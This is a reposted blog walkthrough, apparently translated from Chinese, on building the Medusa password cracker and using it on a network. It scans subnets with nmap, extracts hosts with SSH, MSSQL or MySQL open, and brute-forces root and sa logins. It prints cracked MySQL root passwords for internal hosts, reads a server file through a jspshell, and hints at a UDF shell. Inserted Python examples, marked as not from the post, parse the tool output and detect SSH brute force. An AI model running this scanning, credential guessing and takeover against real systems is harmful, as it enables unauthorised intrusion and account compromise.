Medusa 2.0 – a classic password-cracking tool on Linux

Author: 精灵   Published: 2010-06-30 10:02.   Category: Technical

Reposted from dangdang's blog

When penetrating a Linux network, password cracking is indispensable. Below is an excellent password-cracking tool. First, download it:

wget http://www.foofus.net/jmk/tools/medusa-2.0.tar.gz
or: curl -O http://www.foofus.net/jmk/tools/medusa-2.0.tar.gz

If you do not have libssh2, install http://www.libssh2.org/download/libssh2-1.2.6.tar.gz

If you installed the wrong one, run make uninstall and install again; once it is installed, rm -rf libssh2-1.2.2. The installation steps are:

tar zxvf medusa-2.0.tar.gz

cd medusa-2.0

./configure

Check that ssh appears in the configure output -> enable_module_ssh; if it does not, the build will have no ssh module.

make

make install

On Ubuntu it is just sudo apt-get install libssh2; on other Linux distributions it is as tedious as above.

After installing, run medusa -d to check that every module loads. The following error is common:

+ ssh.mod : Couldn't load "/usr/local/lib/medusa/modules/ssh.mod" [libssh2.so.1: cannot open shared object file: No such file or directory]

libssh2 is installed, but the dynamic loader cannot find it, so we have to add the path by hand. /etc/ld.so.conf lists the default .so search paths, normally /lib and /usr/lib; what we compiled was installed under /usr/local/lib, so that directory has to be added, and then ldconfig run. The steps:

cat /etc/ld.so.conf
include ld.so.conf.d/*.conf
ls ld.so.conf.d/

echo /usr/local/lib > /etc/ld.so.conf.d/local.conf
cat /etc/ld.so.conf.d/*
/usr/local/lib
/usr/lib/mysql
/usr/lib/qt-3.3/lib
ls -l /usr/local/lib/libssh*
-rw-r--r-- 1 root root 752936 06-25 14:33 /usr/local/lib/libssh2.a
-rwxr-xr-x 1 root root 827 06-25 14:33 /usr/local/lib/libssh2.la
lrwxrwxrwx 1 root root 16 06-25 14:33 /usr/local/lib/libssh2.so -> libssh2.so.1.0.1
lrwxrwxrwx 1 root root 16 06-25 14:33 /usr/local/lib/libssh2.so.1 -> libssh2.so.1.0.1
-rwxr-xr-x 1 root root 494064 06-25 14:33 /usr/local/lib/libssh2.so.1.0.1

ldconfig

Finally, verify with ldd /usr/local/lib/medusa/modules/ssh.mod that nothing is left unresolved.
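As an added example (not from the post or from Medusa), here is a small Python check for the situation above: it parses ldd output for a module and reports the sonames the loader cannot resolve, and it lists the directories that ld.so.conf.d fragments add to the search path. The ldd output and the fragment text are constructed to mirror the libssh2 case; they are not captured from a real system.

```python
"""Diagnose 'cannot open shared object file' for a Medusa module from ldd output.
Added example; sample inputs are constructed, not captured from a real host."""
import re
from typing import Dict, List

# Constructed: what `ldd /usr/local/lib/medusa/modules/ssh.mod` might print
# before /usr/local/lib is added to the loader search path.
SAMPLE_LDD_BEFORE = """\
\tlinux-gate.so.1 =>  (0x00110000)
\tlibssh2.so.1 => not found
\tlibssl.so.6 => /lib/libssl.so.6 (0x00a2c000)
\tlibc.so.6 => /lib/libc.so.6 (0x00110000)
\t/lib/ld-linux.so.2 (0x00f4a000)
"""

# Constructed: the same module after the /etc/ld.so.conf.d/local.conf + ldconfig fix.
SAMPLE_LDD_AFTER = """\
\tlinux-gate.so.1 =>  (0x00110000)
\tlibssh2.so.1 => /usr/local/lib/libssh2.so.1 (0x00b1d000)
\tlibssl.so.6 => /lib/libssl.so.6 (0x00a2c000)
\tlibc.so.6 => /lib/libc.so.6 (0x00110000)
\t/lib/ld-linux.so.2 (0x00f4a000)
"""

# Constructed: contents of the ld.so.conf.d fragments, as `cat /etc/ld.so.conf.d/*` shows them.
SAMPLE_CONF_FRAGMENTS = ["/usr/local/lib\n", "/usr/lib/mysql\n/usr/lib/qt-3.3/lib\n"]

# soname => target [(load address)]; the vDSO has an empty target, the loader itself has no '=>'.
LDD_LINE = re.compile(r"^\s*(?P<soname>\S+)\s*=>\s*(?P<target>.*?)(?:\s*\(0x[0-9a-f]+\))?\s*$")


def parse_ldd(output: str) -> Dict[str, str]:
    """Map each 'soname => target' line to its resolved path; '' means 'not found'.
    Entries with no target at all (the vDSO) are skipped, they are not files."""
    resolved: Dict[str, str] = {}
    for line in output.splitlines():
        m = LDD_LINE.match(line)
        if not m:
            continue
        target = m.group("target").strip()
        if target == "":
            continue
        resolved[m.group("soname")] = "" if target == "not found" else target
    return resolved


def missing_libraries(output: str) -> List[str]:
    """Sonames the loader could not find: exactly what `medusa -d` will complain about."""
    return sorted(name for name, path in parse_ldd(output).items() if path == "")


def loader_search_dirs(conf_fragments: List[str]) -> List[str]:
    """Directories the ld.so.conf.d fragments add to the search path.
    Only these (plus the built-in /lib and /usr/lib) are consulted after ldconfig;
    /usr/local/lib is not in the default set, which is why the module failed."""
    dirs: List[str] = []
    for text in conf_fragments:
        for line in text.splitlines():
            line = line.split("#", 1)[0].strip()      # drop comments and blanks
            if line and not line.startswith("include"):
                dirs.append(line)
    return dirs


if __name__ == "__main__":
    print("missing before fix:", missing_libraries(SAMPLE_LDD_BEFORE))
    print("missing after fix: ", missing_libraries(SAMPLE_LDD_AFTER))
    print("extra search dirs: ", loader_search_dirs(SAMPLE_CONF_FRAGMENTS))
```

On a real system, feed it the output of `ldd` on the module and the contents of /etc/ld.so.conf.d/*; a soname that stays in the missing list after ldconfig means the directory holding it is still not on the search path.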

With the path configured, run -d again to confirm that the ssh module now loads. Next comes Medusa's actual usage:

# medusa
Medusa v1.5 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks

ALERT: Host information must be supplied.

Syntax: Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]
-h [TEXT] : Target hostname or IP address
-H [FILE] : File containing target hostnames or IP addresses
-u [TEXT] : Username to test
-U [FILE] : File containing usernames to test
-p [TEXT] : Password to test
-P [FILE] : File containing passwords to test
-C [FILE] : File containing combo entries. See README for more information.
-O [FILE] : File to append log information to
-e [n/s/ns] : Additional password checks ([n] No Password, [s] Password = Username)
-M [TEXT] : Name of the module to execute (without the .mod extension)
-m [TEXT] : Parameter to pass to the module. This can be passed multiple times with a different parameter each time and they will all be sent to the module (i.e. -m Param1 -m Param2, etc.)
-d : Dump all known modules
-n [NUM] : Use for non-default TCP port number
-s : Enable SSL
-g [NUM] : Give up after trying to connect for NUM seconds (default 3)
-r [NUM] : Sleep NUM seconds between retry attempts (default 3)
-R [NUM] : Attempt NUM retries before giving up. The total number of attempts will be NUM + 1.
-t [NUM] : Total number of logins to be tested concurrently
-T [NUM] : Total number of hosts to be tested concurrently
-L : Parallelize logins using one username per thread. The default is to process
the entire username before proceeding.
-f : Stop scanning host after first valid username/password found.
-F : Stop audit after first valid username/password found on any host.
-b : Suppress startup banner
-q : Display module's usage information
-v [NUM] : Verbose level [0 - 6 (more)]
-w [NUM] : Error debug level [0 - 10 (more)]
-V : Display version
-Z [NUM] : Resume scan from host #

Now let's see which modules Medusa has and what each one can crack:

# medusa -d
Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks

Available modules in "." :

Available modules in "/usr/local/lib/medusa/modules" :
+ cvs.mod : Brute force module for CVS sessions : version 2.0
+ ftp.mod : Brute force module for FTP/FTPS sessions : version 2.0
+ http.mod : Brute force module for HTTP : version 2.0
+ imap.mod : Brute force module for IMAP sessions : version 2.0
+ mssql.mod : Brute force module for M$-SQL sessions : version 2.0
+ mysql.mod : Brute force module for MySQL sessions : version 2.0
+ nntp.mod : Brute force module for NNTP sessions : version 2.0
+ pcanywhere.mod : Brute force module for PcAnywhere sessions : version 2.0
+ pop3.mod : Brute force module for POP3 sessions : version 2.0
+ rexec.mod : Brute force module for REXEC sessions : version 2.0
+ rlogin.mod : Brute force module for RLOGIN sessions : version 2.0
+ rsh.mod : Brute force module for RSH sessions : version 2.0
+ smbnt.mod : Brute force module for SMB (LM/NTLM/LMv2/NTLMv2) sessions : version 2.0
+ smtp-vrfy.mod : Brute force module for enumerating accounts via SMTP VRFY : version 2.0
+ smtp.mod : Brute force module for SMTP Authentication with TLS : version 2.0
+ snmp.mod : Brute force module for SNMP Community Strings : version 2.0
+ ssh.mod : Brute force module for SSH v2 sessions : version 2.0
+ telnet.mod : Brute force module for telnet sessions : version 2.0
+ vmauthd.mod : Brute force module for the VMware Authentication Daemon : version 2.0
+ vnc.mod : Brute force module for VNC sessions : version 2.0
+ web-form.mod : Brute force module for web forms : version 2.0
+ wrapper.mod : Generic Wrapper Module : version 2.0

The list of supported targets is very comprehensive, which helps a lot in a penetration test. First we pick targets: scan for machines with SSH open, any subnet will do. Scan the whole subnet for hosts with port 22 open, detect the service version, and save the result to a file named ssh:

nmap -sV -p22 -oG ssh 172.20.3.0/24

Interesting ports on 172.20.3.132:
PORT STATE SERVICE VERSION
22/tcp filtered ssh
MAC Address: 00:1E:4F:16:B9:DB (Unknown)

Interesting ports on 172.20.3.133:
PORT STATE SERVICE VERSION
22/tcp filtered ssh
MAC Address: 00:1E:4F:13:09:E5 (Unknown)

Interesting ports on 172.20.3.134:
PORT STATE SERVICE VERSION
22/tcp filtered ssh
MAC Address: 00:1E:4F:13:72:49 (Unknown)

………………

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
MAC Address: 00:26:B9:5E:77:7A (Unknown)

Interesting ports on 172.20.3.148:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
MAC Address: 00:26:B9:5E:79:D0 (Unknown)

Interesting ports on 172.20.3.150:
PORT STATE SERVICE VERSION
22/tcp closed ssh
MAC Address: 00:1E:4F:16:B8:2F (Unknown)

Interesting ports on 172.20.3.151:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
MAC Address: 00:1E:4F:16:B9:EF (Unknown)

Interesting ports on 172.20.3.152:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
MAC Address: 00:1A:A0:1C:0B:C2 (Unknown)

Interesting ports on 172.20.3.254:
PORT STATE SERVICE VERSION
22/tcp filtered ssh
MAC Address: 00:10:DB:FF:22:E0 (Juniper Networks)

Nmap finished: 256 IP addresses (64 hosts up) scanned in 33.634 seconds
cat ssh
# Nmap 4.11 scan initiated Fri Jun 25 15:25:50 2010 as: nmap -sV -p22 -oG ssh 172.20.3.0/24
Host: 172.20.3.12 () Ports: 22/closed/tcp//ssh///
Host: 172.20.3.13 () Ports: 22/closed/tcp//ssh///
Host: 172.20.3.16 () Ports: 22/closed/tcp//ssh///
Host: 172.20.3.19 () Ports: 22/closed/tcp//ssh///
Host: 172.20.3.28 () Ports: 22/open/tcp//ssh//OpenSSH 3.9p1 (protocol 1.99)/
Host: 172.20.3.55 () Ports: 22/closed/tcp//ssh///
Host: 172.20.3.58 () Ports: 22/closed/tcp//ssh///
Host: 172.20.3.61 () Ports: 22/open/tcp//ssh//OpenSSH 4.3 (protocol 2.0)/
Host: 172.20.3.62 () Ports: 22/open/tcp//ssh//OpenSSH 3.9p1 (protocol 1.99)/
Host: 172.20.3.63 () Ports: 22/open/tcp//ssh//OpenSSH 3.9p1 (protocol 1.99)/
Host: 172.20.3.64 () Ports: 22/open/tcp//ssh//OpenSSH 3.9p1 (protocol 1.99)/
Host: 172.20.3.67 () Ports: 22/open/tcp//ssh//OpenSSH 3.9p1 (protocol 1.99)/
Host: 172.20.3.70 () Ports: 22/open/tcp//ssh//OpenSSH 4.3 (protocol 2.0)/
Host: 172.20.3.71 () Ports: 22/open/tcp//ssh//OpenSSH 4.3 (protocol 2.0)/
Host: 172.20.3.72 () Ports: 22/open/tcp//ssh//OpenSSH 4.3 (protocol 2.0)/
Host: 172.20.3.73 () Ports: 22/open/tcp//ssh//OpenSSH 4.3 (protocol 2.0)/
Host: 172.20.3.74 () Ports: 22/open/tcp//ssh//OpenSSH 4.3 (protocol 2.0)/
Host: 172.20.3.75 () Ports: 22/open/tcp//ssh//OpenSSH 4.3 (protocol 2.0)/
Host: 172.20.3.76 () Ports: 22/open/tcp//ssh//OpenSSH 4.3 (protocol 2.0)/
Host: 172.20.3.77 () Ports: 22/open/tcp//ssh//OpenSSH 4.3 (protocol 2.0)/
Host: 172.20.3.78 () Ports: 22/open/tcp//ssh//OpenSSH 4.3 (protocol 2.0)/
Host: 172.20.3.79 () Ports: 22/open/tcp//ssh//OpenSSH 3.9p1 (protocol 2.0)/
Host: 172.20.3.80 () Ports: 22/open/tcp//ssh//OpenSSH 3.9p1 (protocol 2.0)/
Host: 172.20.3.81 () Ports: 22/open/tcp//ssh//OpenSSH 3.9p1 (protocol 2.0)/
Host: 172.20.3.82 () Ports: 22/open/tcp//ssh//OpenSSH 3.9p1 (protocol 2.0)/
Host: 172.20.3.83 () Ports: 22/open/tcp//ssh//OpenSSH 3.9p1 (protocol 2.0)/
Host: 172.20.3.84 () Ports: 22/open/tcp//ssh//OpenSSH 3.9p1 (protocol 2.0)/
Host: 172.20.3.85 () Ports: 22/open/tcp//ssh//OpenSSH 4.3 (protocol 2.0)/
Host: 172.20.3.88 () Ports: 22/open/tcp//ssh//OpenSSH 4.3 (protocol 2.0)/
Host: 172.20.3.91 () Ports: 22/closed/tcp//ssh///
Host: 172.20.3.94 () Ports: 22/closed/tcp//ssh///
Host: 172.20.3.97 () Ports: 22/open/tcp//ssh//OpenSSH 3.9p1 (protocol 2.0)/
Host: 172.20.3.110 () Ports: 22/closed/tcp//ssh///
Host: 172.20.3.111 () Ports: 22/closed/tcp//ssh///
Host: 172.20.3.112 () Ports: 22/open/tcp//ssh//OpenSSH 3.9p1 (protocol 1.99)/
Host: 172.20.3.113 () Ports: 22/open/tcp//ssh//OpenSSH 3.9p1 (protocol 2.0)/
Host: 172.20.3.114 () Ports: 22/open/tcp//ssh//OpenSSH 3.9p1 (protocol 2.0)/
Host: 172.20.3.117 (ygxy1) Ports: 22/open/tcp//ssh//OpenSSH 4.3 (protocol 2.0)/
Host: 172.20.3.118 () Ports: 22/open/tcp//ssh//OpenSSH 3.9p1 (protocol 2.0)/
Host: 172.20.3.119 () Ports: 22/closed/tcp//ssh///
Host: 172.20.3.121 () Ports: 22/closed/tcp//ssh///
Host: 172.20.3.123 () Ports: 22/closed/tcp//ssh///
Host: 172.20.3.124 () Ports: 22/closed/tcp//ssh///
Host: 172.20.3.125 () Ports: 22/open/tcp//ssh//OpenSSH 3.9p1 (protocol 2.0)/
Host: 172.20.3.126 () Ports: 22/open/tcp//ssh//OpenSSH 3.9p1 (protocol 2.0)/
Host: 172.20.3.128 () Ports: 22/filtered/tcp//ssh///
Host: 172.20.3.129 () Ports: 22/filtered/tcp//ssh///
Host: 172.20.3.130 () Ports: 22/filtered/tcp//ssh///
Host: 172.20.3.132 () Ports: 22/filtered/tcp//ssh///
Host: 172.20.3.133 () Ports: 22/filtered/tcp//ssh///
Host: 172.20.3.134 () Ports: 22/filtered/tcp//ssh///
Host: 172.20.3.135 () Ports: 22/closed/tcp//ssh///
Host: 172.20.3.136 () Ports: 22/open/tcp//ssh//OpenSSH 4.3 (protocol 2.0)/
Host: 172.20.3.141 () Ports: 22/open/tcp//ssh//OpenSSH 4.3 (protocol 2.0)/
Host: 172.20.3.142 () Ports: 22/open/tcp//ssh//OpenSSH 4.3 (protocol 2.0)/
Host: 172.20.3.143 () Ports: 22/open/tcp//ssh//OpenSSH 4.3 (protocol 2.0)/
Host: 172.20.3.145 () Ports: 22/closed/tcp//ssh///
Host: 172.20.3.146 () Ports: 22/closed/tcp//ssh///
Host: 172.20.3.147 () Ports: 22/open/tcp//ssh//OpenSSH 4.3 (protocol 2.0)/
Host: 172.20.3.148 () Ports: 22/open/tcp//ssh//OpenSSH 4.3 (protocol 2.0)/
Host: 172.20.3.150 () Ports: 22/closed/tcp//ssh///
Host: 172.20.3.151 () Ports: 22/open/tcp//ssh//OpenSSH 3.9p1 (protocol 1.99)/
Host: 172.20.3.152 () Ports: 22/open/tcp//ssh//OpenSSH 3.9p1 (protocol 1.99)/
Host: 172.20.3.254 () Ports: 22/filtered/tcp//ssh///
# Nmap run completed at Fri Jun 25 15:26:24 2010 -- 256 IP addresses (64 hosts up) scanned in 33.634 seconds

Something like that. Now we tidy it up and pull out the IPs that have SSH open; this is what saving with -oG was for:

grep 22/open ssh | cut -d " " -f 2 >>ssh1.txt

cat ssh1.txt

172.20.3.28
172.20.3.61
172.20.3.62
172.20.3.63
172.20.3.64
172.20.3.67
172.20.3.70
172.20.3.71
172.20.3.72
172.20.3.73
172.20.3.74
172.20.3.75
172.20.3.76
172.20.3.77
172.20.3.78
172.20.3.79
172.20.3.80
172.20.3.81
172.20.3.82
172.20.3.83
172.20.3.84
172.20.3.85
172.20.3.88
172.20.3.97
172.20.3.112
172.20.3.113
172.20.3.114
172.20.3.117
172.20.3.118
172.20.3.125
172.20.3.126
172.20.3.136
172.20.3.141
172.20.3.142
172.20.3.143
172.20.3.147
172.20.3.148
172.20.3.151
172.20.3.152
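The grep/cut pipeline above is fine for one port. As an added example (not from the post or from nmap), the Python below parses the -oG host lines field by field, reproduces the open-host list, and also pulls out the hosts whose banner says "protocol 1.99", which means the server still negotiates SSH-1 with old clients and is the first thing to reconfigure on the defending side. The sample input is a handful of the post's own scan lines assembled as a constructed file.

```python
"""Parse nmap grepable (-oG) output such as the 'ssh' file above.
Added example; the sample text is constructed from lines the post shows."""
import re
from typing import Dict, List, NamedTuple

# Constructed sample in the -oG format above (a subset of the post's scan).
SAMPLE_OG = """\
# Nmap 4.11 scan initiated Fri Jun 25 15:25:50 2010 as: nmap -sV -p22 -oG ssh 172.20.3.0/24
Host: 172.20.3.12 () Ports: 22/closed/tcp//ssh///
Host: 172.20.3.28 () Ports: 22/open/tcp//ssh//OpenSSH 3.9p1 (protocol 1.99)/
Host: 172.20.3.61 () Ports: 22/open/tcp//ssh//OpenSSH 4.3 (protocol 2.0)/
Host: 172.20.3.117 (ygxy1) Ports: 22/open/tcp//ssh//OpenSSH 4.3 (protocol 2.0)/
Host: 172.20.3.128 () Ports: 22/filtered/tcp//ssh///
# Nmap run completed at Fri Jun 25 15:26:24 2010 -- 256 IP addresses (64 hosts up) scanned in 33.634 seconds
"""


class PortRecord(NamedTuple):
    host: str
    hostname: str
    port: int
    proto: str
    state: str
    service: str
    version: str


# "Host: <ip> (<name>) Ports: <entries>"; comment lines and Status: lines do not match.
HOST_LINE = re.compile(r"^Host:\s+(?P<ip>\S+)\s+\((?P<name>[^)]*)\)\s+Ports:\s+(?P<ports>.*)$")


def parse_grepable(text: str) -> List[PortRecord]:
    """One PortRecord per port entry. A -oG port entry is
    port/state/proto/owner/service/rpcinfo/version/ with empty fields left blank."""
    records: List[PortRecord] = []
    for line in text.splitlines():
        m = HOST_LINE.match(line)
        if not m:
            continue
        for entry in m.group("ports").split(","):
            fields = entry.strip().split("/")
            if len(fields) < 7:
                continue
            records.append(PortRecord(m.group("ip"), m.group("name"), int(fields[0]),
                                      fields[2], fields[1], fields[4], fields[6]))
    return records


def open_hosts(text: str, port: int) -> List[str]:
    """Same result as `grep 22/open ssh | cut -d " " -f 2`, keyed on the parsed fields."""
    return [r.host for r in parse_grepable(text) if r.port == port and r.state == "open"]


def legacy_ssh_hosts(text: str) -> Dict[str, str]:
    """Hosts whose banner advertises 'protocol 1.99': the daemon still accepts
    SSH-1 clients. A defender wants these moved to 'Protocol 2' before anything else."""
    return {r.host: r.version for r in parse_grepable(text)
            if r.service == "ssh" and r.state == "open" and "protocol 1.99" in r.version}


if __name__ == "__main__":
    print("open on 22:", open_hosts(SAMPLE_OG, 22))
    print("SSH-1 compatible:", legacy_ssh_hosts(SAMPLE_OG))
```

Pass it the whole ssh file to get the same list the post builds with grep and cut, plus the SSH-1-compatible subset as an inventory of hosts to harden.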

Load the ssh module and start cracking SSH:
medusa -H ssh1.txt -u root -P p.txt -M ssh
Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks

ACCOUNT CHECK: [ssh] Host: 172.20.3.28 (1 of 39, 0 complete) User: root (1 of 1, 0 complete) Password: aaaaaa (1 of 51 complete)
ACCOUNT CHECK: [ssh] Host: 172.20.3.28 (1 of 39, 0 complete) User: root (1 of 1, 0 complete) Password: 1 (6 of 51 complete)
ACCOUNT CHECK: [ssh] Host: 172.20.3.28 (1 of 39, 0 complete) User: root (1 of 1, 0 complete) Password: 11 (7 of 51 complete)
ACCOUNT CHECK: [ssh] Host: 172.20.3.28 (1 of 39, 0 complete) User: root (1 of 1, 0 complete) Password: 111 (8 of 51 complete)
ACCOUNT CHECK: [ssh] Host: 172.20.3.28 (1 of 39, 0 complete) User: root (1 of 1, 0 complete) Password: 1111 (9 of 51 complete)
ACCOUNT CHECK: [ssh] Host: 172.20.3.28 (1 of 39, 0 complete) User: root (1 of 1, 0 complete) Password: 11111 (10 of 51 complete)
ACCOUNT CHECK: [ssh] Host: 172.20.3.28 (1 of 39, 0 complete) User: root (1 of 1, 0 complete) Password: 123 (11 of 51 complete)
ACCOUNT CHECK: [ssh] Host: 172.20.3.28 (1 of 39, 0 complete) User: root (1 of 1, 0 complete) Password: 1234 (12 of 51 complete)
………………
Cracking means a long wait; SSH cracking is not fast. Keep the dictionary to somewhere between a dozen and 100 common passwords, otherwise the run takes a long time. Alternatively, tune -t and -T to speed things up a little.
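Seen from the target's side, a run like the one above leaves a dense burst of "Failed password" lines from a single source in the sshd log. As an added example (not part of the post), the Python below implements the detection a defender would want: a sliding-window count of failures per source address, the set of usernames tried, and whether the same source then logged in successfully, which is the case that needs incident response rather than just a block rule. The log lines and the address 10.0.0.5 are constructed.

```python
"""Detect a Medusa-style SSH password run in sshd syslog lines.
Added example; the log sample and the source address are constructed."""
from collections import defaultdict, deque
from datetime import datetime, timedelta
import re
from typing import Deque, Dict, List, Tuple

# Constructed sample: one source hammering root, then a success; one normal user elsewhere.
SAMPLE_AUTH_LOG = """\
Jun 26 10:42:31 db01 sshd[2201]: Failed password for root from 10.0.0.5 port 50211 ssh2
Jun 26 10:42:32 db01 sshd[2203]: Failed password for root from 10.0.0.5 port 50212 ssh2
Jun 26 10:42:33 db01 sshd[2205]: Failed password for root from 10.0.0.5 port 50213 ssh2
Jun 26 10:42:34 db01 sshd[2207]: Failed password for invalid user admin from 10.0.0.5 port 50214 ssh2
Jun 26 10:42:35 db01 sshd[2209]: Failed password for root from 10.0.0.5 port 50215 ssh2
Jun 26 10:42:36 db01 sshd[2211]: Accepted password for root from 10.0.0.5 port 50216 ssh2
Jun 26 10:50:01 db01 sshd[2300]: Failed password for alice from 192.168.1.20 port 40001 ssh2
Jun 26 11:05:00 db01 sshd[2350]: Accepted publickey for alice from 192.168.1.20 port 40002 ssh2
"""

# OpenSSH auth lines: "<Failed|Accepted> <method> for [invalid user] <user> from <src> port <n>"
LOG_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+\s+\d\d:\d\d:\d\d)\s+\S+\s+sshd\[\d+\]:\s+"
    r"(?P<result>Failed|Accepted)\s+(?P<method>\w+)\s+for\s+(?:invalid user\s+)?"
    r"(?P<user>\S+)\s+from\s+(?P<src>\S+)\s+port\s+\d+"
)


def parse_events(text: str, year: int = 2010) -> List[Tuple[datetime, str, str, str]]:
    """(timestamp, source, user, result) per auth line; syslog omits the year, so supply it."""
    events = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            events.append((ts, m["src"], m["user"], m["result"]))
    return events


def brute_force_sources(text: str, threshold: int = 5,
                        window: timedelta = timedelta(minutes=1)) -> Dict[str, dict]:
    """Sources with at least `threshold` failures inside any `window`, with the usernames
    tried and the first success from that source afterwards (None if there was none)."""
    recent: Dict[str, Deque[Tuple[datetime, str]]] = defaultdict(deque)
    flagged: Dict[str, dict] = {}
    for ts, src, user, result in parse_events(text):
        if result == "Failed":
            q = recent[src]
            q.append((ts, user))
            while q and ts - q[0][0] > window:      # slide the window forward
                q.popleft()
            if len(q) >= threshold and src not in flagged:
                flagged[src] = {"first_seen": q[0][0],
                                "users": sorted({u for _, u in q}),
                                "success_after": None}
        elif src in flagged and flagged[src]["success_after"] is None:
            flagged[src]["success_after"] = (ts, user)   # compromise, not just noise
    return flagged


if __name__ == "__main__":
    for src, info in brute_force_sources(SAMPLE_AUTH_LOG).items():
        print(src, info)
```

Run it over /var/log/auth.log (or secure) with a threshold matched to the site's normal failure rate; a flagged source with success_after set should be treated as a compromised account, not merely rate-limited.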

It is also worth scanning for SQL...

nmap -sV -oG mssql 172.20.0-5.1-254 -p1433 // scans 172.20.0.1-172.20.5.254

grep 1433/open mssql | cut -d " " -f 2 >>mssql.txt

medusa -H mssql.txt -u sa -P mssql_pass.dic -M mssql

Nothing was cracked. Try MySQL next:

# medusa -H mysql.txt -u root -P p.txt -M mysql -O pass.log // results are written to pass.log

cat pass.log
# Medusa v.2.0 (2010-06-26 10:42:32)
# medusa -H mysql.txt -u root -P p.txt -M mysql -O pass.log
ACCOUNT FOUND: [mysql] Host: 172.20.1.115 User: root Password: 12345678 [SUCCESS]
ACCOUNT FOUND: [mysql] Host: 172.20.3.58 User: root Password: mysql [SUCCESS]
# Medusa has finished (2010-06-26 10:55:11).

Not bad luck. Next, connect to the MySQL on 172.20.1.115 through a jspshell and run:
select load_file('c:/boot.ini');

[boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(2)\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(2)\WINDOWS="Windows Server 2003, Enterprise" /fastdetect /NoExecute=OptIn

So it is Windows 2003; one could go on to write in a UDF and get a shell...

Finally, the official changelog: http://www.foofus.net/~jmk/medusa/ChangeLog

Tags: password cracking, linux


Visitor comments

  1. 2010-07-02 17:07

    You're still alive... I thought you had disappeared... Also, the site address changed... I came to see you. How have you been lately?

  2. 精灵
    2010-07-02 20:33

    Quoting 不落:
    You're still alive... I thought you had disappeared... Also, the site address changed... I came to see you. How have you been lately?

    Not dead yet; let's go out for a drink when there's time.

  3. 2010-07-09 12:23

    Quoting 精灵:
    Quoting 不落:
    You're still alive... I thought you had disappeared... Also, the site address changed... I came to see you. How have you been lately?
    Not dead yet; let's go out for a drink when there's time.

    Drink, my foot. You screw people over all day long... neeke is in Beijing too...

  4. 精灵
    2010-07-09 14:34

    Quoting 不落:
    Quoting 精灵:
    Quoting 不落:
    You're still alive... I thought you had disappeared... Also, the site address changed... I came to see you. How have you been lately?
    Not dead yet; let's go out for a drink when there's time.
    Drink, my foot. You screw people over all day long... neeke is in Beijing too...

    Damn it, when did I ever screw anyone over?

  5. 2010-07-09 20:04

    Quoting 精灵:
    Quoting 不落:
    Quoting 精灵:
    Quoting 不落:
    You're still alive... I thought you had disappeared... Also, the site address changed... I came to see you. How have you been lately?
    Not dead yet; let's go out for a drink when there's time.
    Drink, my foot. You screw people over all day long... neeke is in Beijing too...
    Damn it, when did I ever screw anyone over?

    ......Beijinger....

  6. 2010-07-10 00:39

    Quoting 不落:
    Quoting 精灵:
    Quoting 不落:
    Quoting 精灵:
    Quoting 不落:
    You're still alive... I thought you had disappeared... Also, the site address changed... I came to see you. How have you been lately?
    Not dead yet; let's go out for a drink when there's time.
    Drink, my foot. You screw people over all day long... neeke is in Beijing too...
    Damn it, when did I ever screw anyone over?
    ......Beijinger....

    Just here to watch.

  7. 精灵
    2010-07-10 00:53

    Quoting Neeke:
    Quoting 不落:
    Quoting 精灵:
    Quoting 不落:
    Quoting 精灵:
    Quoting 不落:
    You're still alive... I thought you had disappeared... Also, the site address changed... I came to see you. How have you been lately?
    Not dead yet; let's go out for a drink when there's time.
    Drink, my foot. You screw people over all day long... neeke is in Beijing too...
    Damn it, when did I ever screw anyone over?
    ......Beijinger....
    Just here to watch.

    FUCK
